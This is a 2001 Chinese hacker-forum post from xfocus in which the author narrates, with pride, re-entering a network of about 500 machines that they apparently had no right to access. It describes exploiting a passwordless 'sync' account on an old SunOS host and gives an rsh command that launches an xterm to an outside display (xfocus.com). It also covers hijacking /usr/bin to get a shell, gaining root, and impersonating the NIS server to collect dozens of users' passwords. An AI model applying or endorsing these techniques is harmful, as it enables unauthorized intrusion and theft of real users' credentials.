标?题：我也来贴一篇 -- 咱们本门的功夫。不过比他就差远了。
发信站：安全焦点（2001-11-16 14:52:35）

无聊，上网逛逛，想起某地我还有一个网络有OpenVMS 7.5,半年没玩儿了，过去瞧瞧。

一瞧，顿然觉得失败，半年没见，那边的Admin竟然重新对所有机器进行了安全加强配置，而我当年竟然一时心软，没留一个隐蔽一点的后门 -- 连shadow都没拉回来 -- 失败，太失败了。

不甘心哪，我的500台大机 -- AIX,HP-UX,Tru64,Irix还有变态西西的VMS...

实在是不甘心，我一定要再拿回来！

好吧，开始扫描，再看看它有什么漏洞。

========================================================================

所有的机器都是用nis集中认证，用户home也都是nfs的，每种平台都坚持最少服务原则，开放的服务也都打了补丁的...呜呜呜，看来是没漏洞了吗？

试，试试试，再试！

没用，所有的远程溢出都没用，只有一台机器开了Finger,结果还告诉我：你的地址已被记录在案 -- 晕倒。

好吧，忽然，发现一台粉老粉老的东东，keep?
竟然是Sun OS 4.13，呵呵，拿来做留念的啊？
这台也是NFS服务器之一，showmount一下，竟然有两百多台机器nfs在这里。

服务开放：22,110,512,513,6000没了...

看来没希望啦？
老机有老机的应付方法，某些老系统可是存在一个却省账号 -- sync的哦。
而且很多系统中这个账号都是没有passwd的！好吧，就这么办。

ssh连接，试探一下，OK!果然没有密码...可惜，也没有shell :_<
sync账号的却省shell当然就是sync了嘛！

好像还是没有用。
ssh不行，咱们rlogin再试试看...不行，还是不行...

进不去？那咱们就让他出来...
rsh -l sync keep \"/usr/openwin/bin/xterm -display xfocus.com:0\"

不行，好像是超时，再试，还是不行，看来是做了某些设置了...又失败。

快绝望了...呜呜呜...Quack哪，再给我多一点点...

忽然间，从眼泪中看到了灵光一闪！能X?那我当然也能X进去啦。

Ok,xdmcp,query,连接...失败...还是不行那...
这回真的绝望了...睡觉去。

========================================================================

一觉醒来，到别的机器上看看，X登录到了两台机器，忽然之间灵机一动 -- 如果一台机器同时有几台机器Xdmcp的话，那X屏幕号就不是0了！而我的X一直设的:0!

改成:9,继续登录，几秒钟停顿之后，终于出现了激动人心的OpenWindow登录界面！激动呀！真的好激动！user:sync  pass:<null>，进去了！

几分钟之后，心情又从激动变成了空虚...
为什么上天对我如此的不公...那个弱智root,sync账号的xinitrc竟然有错误，我不但不能得到一个却省的xterm,而且能够运行的程序还只有两个 -- xedit和文件管理器 -- 没有一个shell,还是一切都等于0.

算了，这种情况也不是没有遇见过，至少sync还是和root同组的嘛，四处逛逛，要是它哪个文件权限设错，哪就，嘿嘿嘿嘿～～～

／.rhosts,读都不能读；/.xxxrc，都是只读;/.....没了
/etc,继续检查，发现hosts.allow，倒是我这个组可写，可惜修改了也没什么用...
/etc/passwd倒是可以看，可惜我不报多大希望crack它的...这边的密码强度我是早见识过 -- 除非是8位以上的穷举...

看来是没办法了...无意之间，逛到了/usr，幸运之神再一次降临到了我的脚下，哈哈,/usr -rwxrwxr--！

算你倒霉，竟然/usr属于我这个组，而且同组可写！虽然bin我不能修改...
好吧，冒一次险，我mv /usr/bin!

没有shell真的好痛苦呀，我还得忍受奇慢无比的X......点一下鼠标它要10分钟才能反应过来 -- 不愧是古董级得机器！

慢慢的，在文件管理其中执行了如下操作：
mv /usr/bin /usr/binn
mkdir /usr/bin
然后写了一个脚本，叫做sync，里面有一条命令，xterm什么的......嘿嘿嘿

哪边再登录一次... God！报错！/bin/login not found.
我竟然犯了那么危险的一个错误！
忘了这一点...好险，好吧，
mv /usr/bin/sync /usr/bin/login

再登录......终于，我这边的X缓慢的出现了一个term...松了一口气。
赶快把/usr/binn改回去，一面有人登录就麻烦了。

既然有了一个shell,后面就都简单了，从SunOS古老的漏洞中随便选几个出来，i am root!

既然是nis,su某用户就可以通行无阻啦！俺是良民嘛！

========================================================================
接下来的几天里，就是拿着良民证到处看看，最后选定一台HP-UX作为基地，用俺的独家利器得到了root，先备份回整个NIS数据库；然后让真正的NIS Server睡一会会儿觉，我就暂时替他看着，这一会儿嘛，当然会有很多用户到我这儿来报道啦，密码一个个等级好，差不多五六十个了。叫醒nis,我睡觉去了。

虽然只有五六十个普通用户，但是可是有500台各种平台的机器玩啊，俺又没那么黑，非要各个都是root.

重在学习嘛！

--
※ 来源:·安全焦点讨论区 www.xfocus.org·